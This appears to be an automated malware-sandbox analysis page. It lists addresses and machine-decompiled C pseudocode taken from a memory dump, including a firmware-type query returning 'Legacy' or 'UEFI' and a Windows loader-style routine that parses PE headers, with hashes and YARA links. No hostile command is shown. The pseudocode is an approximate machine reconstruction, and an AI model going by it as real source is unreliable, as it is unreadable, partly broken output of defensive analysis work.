                                                                                                    0x00000000
                                                                                                    0x00b4e7d8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b4e722
                                                                                                    0x00b4e72e
                                                                                                    0x00b4e748
                                                                                                    0x00b4e74c
                                                                                                    0x00b4e754
                                                                                                    0x00b4e756
                                                                                                    0x00b4e75c
                                                                                                    0x00b4e75c
                                                                                                    0x00000000
                                                                                                    0x00b4e75c
                                                                                                    0x00b4e758
                                                                                                    0x00b4e758
                                                                                                    0x00000000
                                                                                                    0x00b4e758
                                                                                                    0x00b4e750
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b4e752
                                                                                                    0x00000000
                                                                                                    0x00b4e752
                                                                                                    0x00b4e730
                                                                                                    0x00b4e735
                                                                                                    0x00b4e73d
                                                                                                    0x00b4e73f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b4e741
                                                                                                    0x00b4e741
                                                                                                    0x00000000
                                                                                                    0x00b4e741
                                                                                                    0x00b4e739
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b4e73b
                                                                                                    0x00000000
                                                                                                    0x00b4e73b
                                                                                                    0x00b4e722
                                                                                                    0x00b4e720
                                                                                                    0x00b4e6b0
                                                                                                    0x00b4e618
                                                                                                    0x00000000
                                                                                                    0x00b4e618

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `$`
                                                                                                    • API String ID: 0-197956300
                                                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                    • Instruction ID: b87e657455c21c4591b88b6e997b69688fef50fa2c8b691bf5713e029227fe27
                                                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                    • Instruction Fuzzy Hash: 16917C312043419BEB24CF29C945B2BB7E5FF84724F14896DF9A9CB281E774EA04DB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B051BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 77%
                                                                                                    			E00B051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb605f0);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B053CA(0);
						return E00ADD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00ACF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00AA3690(1, _t117, 0xa61810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00ACAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AA4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00ACAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B0500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00AC9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                    0x00b051be
                                                                                                    0x00b051c3
                                                                                                    0x00b051c8
                                                                                                    0x00b051cd
                                                                                                    0x00b051d0
                                                                                                    0x00b051d3
                                                                                                    0x00b051d8
                                                                                                    0x00b051db
                                                                                                    0x00b051de
                                                                                                    0x00b051e0
                                                                                                    0x00b051e3
                                                                                                    0x00b051e6
                                                                                                    0x00b051e8
                                                                                                    0x00b05342
                                                                                                    0x00b05351
                                                                                                    0x00b05356
                                                                                                    0x00b0535a
                                                                                                    0x00b05360
                                                                                                    0x00b05363
                                                                                                    0x00b05366
                                                                                                    0x00b05369
                                                                                                    0x00b05369
                                                                                                    0x00b0536b
                                                                                                    0x00b0536b
                                                                                                    0x00b05370
                                                                                                    0x00b053a3
                                                                                                    0x00b053a4
                                                                                                    0x00b053a6
                                                                                                    0x00b053ab
                                                                                                    0x00b053ab
                                                                                                    0x00b053ae
                                                                                                    0x00b053ae
                                                                                                    0x00b053b5
                                                                                                    0x00b053bf
                                                                                                    0x00b053bf
                                                                                                    0x00b05375
                                                                                                    0x00b05396
                                                                                                    0x00b053a0
                                                                                                    0x00b053a0
                                                                                                    0x00000000
                                                                                                    0x00b05396
                                                                                                    0x00b05377
                                                                                                    0x00b05379
                                                                                                    0x00b0537f
                                                                                                    0x00b0538c
                                                                                                    0x00b05390
                                                                                                    0x00000000
                                                                                                    0x00b05390
                                                                                                    0x00b051ee
                                                                                                    0x00b051f1
                                                                                                    0x00b05301
                                                                                                    0x00b05310
                                                                                                    0x00b05315
                                                                                                    0x00b05318
                                                                                                    0x00b0531b
                                                                                                    0x00b05320
                                                                                                    0x00b0532e
                                                                                                    0x00b05331
                                                                                                    0x00000000
                                                                                                    0x00b05331
                                                                                                    0x00b05328
                                                                                                    0x00b05329
                                                                                                    0x00000000
                                                                                                    0x00b05329
                                                                                                    0x00b051fa
                                                                                                    0x00b05235
                                                                                                    0x00b05236
                                                                                                    0x00b05239
                                                                                                    0x00b0523f
                                                                                                    0x00b05240
                                                                                                    0x00b05241
                                                                                                    0x00b05242
                                                                                                    0x00b05246
                                                                                                    0x00b05247
                                                                                                    0x00b0524e
                                                                                                    0x00b05251
                                                                                                    0x00b05267
                                                                                                    0x00b05269
                                                                                                    0x00b0526e
                                                                                                    0x00b0527d
                                                                                                    0x00b0527e
                                                                                                    0x00b05281
                                                                                                    0x00b05282
                                                                                                    0x00b05287
                                                                                                    0x00b05288
                                                                                                    0x00b0528a
                                                                                                    0x00b0528f
                                                                                                    0x00b05294
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b0529a
                                                                                                    0x00b0529c
                                                                                                    0x00b0529e
                                                                                                    0x00b0529e
                                                                                                    0x00b052a4
                                                                                                    0x00b052b0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b052ba
                                                                                                    0x00b052bc
                                                                                                    0x00b052bc
                                                                                                    0x00b052d4
                                                                                                    0x00b052d9
                                                                                                    0x00b052dc
                                                                                                    0x00b052e1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b052e7
                                                                                                    0x00b052f4
                                                                                                    0x00000000
                                                                                                    0x00b052f4
                                                                                                    0x00b05270
                                                                                                    0x00000000
                                                                                                    0x00b05270
                                                                                                    0x00b051fc
                                                                                                    0x00b051fd
                                                                                                    0x00b05202
                                                                                                    0x00b05203
                                                                                                    0x00b05205
                                                                                                    0x00b0520a
                                                                                                    0x00b0520f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b0521b
                                                                                                    0x00b05226
                                                                                                    0x00b0522b
                                                                                                    0x00b0521d
                                                                                                    0x00b0521d
                                                                                                    0x00b05222
                                                                                                    0x00b05222
                                                                                                    0x00b0522d
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Legacy$UEFI
                                                                                                    • API String ID: 2994545307-634100481
                                                                                                    • Opcode ID: 4bb24790730fb052ea963611a251475d0c7701d282c5005bb8ad6a3ed5e67b52
                                                                                                    • Instruction ID: 59a5c87830d5473cc469e56d8d42a48cc8f95eabe64aa49a768275807d031c2b
                                                                                                    • Opcode Fuzzy Hash: 4bb24790730fb052ea963611a251475d0c7701d282c5005bb8ad6a3ed5e67b52
                                                                                                    • Instruction Fuzzy Hash: 55517071A00A189FDB24DFA8C980BAEBBF8FF44740F1444ADE55AEB691D7719900CF14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A9D5E0, Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 87%
                                                                                                    			E00A9D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xb7d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00A96600(0xb752d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xb77b9c; // 0x0
							_t281 = L00AA4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00ACF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xb77b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0xb77b8c; // 0x552ad8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00AA2280(_t200, 0xb784d8);
									_t277 =  *0xb785f4; // 0x552fc8
									_t351 =  *0xb785f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x552f60
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00A9FFB0(_t287, _t353, 0xb784d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00ADCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00A96600(0xb752d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00A97926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xb7b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00B0E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xb78472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0xb7b218; // 0x0
														asm("ror edi, cl");
														 *0xb7b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00AA2280(_t250, 0xb784d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00AC3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00A9FFB0(_t293, _t353, 0xb784d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00AC37F5(_t353, 0);
																}
																E00AC0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00AB9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00AB02D6(_t174);
																}
																L00AA77F0( *0xb77b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00ABC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00A9EC7F(_t353);
										L00AB19B8(_t287, 0, _t353, 0);
										_t200 = E00A8F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00ACB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0xb7b2f8; // 0x0
									if((_t206 |  *0xb7b2fc) == 0 || ( *0xb7b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0xb7b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E00B36B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E00B36AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E00A9E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L00A9EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E00AC9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E00A9E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L00A98F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00AC3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                                    0x00a9d5f2
                                                                                                    0x00a9d5f5
                                                                                                    0x00a9d5f5
                                                                                                    0x00a9d5fd
                                                                                                    0x00a9d600
                                                                                                    0x00a9d60a
                                                                                                    0x00a9d60d
                                                                                                    0x00a9d617
                                                                                                    0x00a9d61d
                                                                                                    0x00a9d627
                                                                                                    0x00a9d62e
                                                                                                    0x00a9d911
                                                                                                    0x00a9d913
                                                                                                    0x00000000
                                                                                                    0x00a9d919
                                                                                                    0x00a9d919
                                                                                                    0x00a9d919
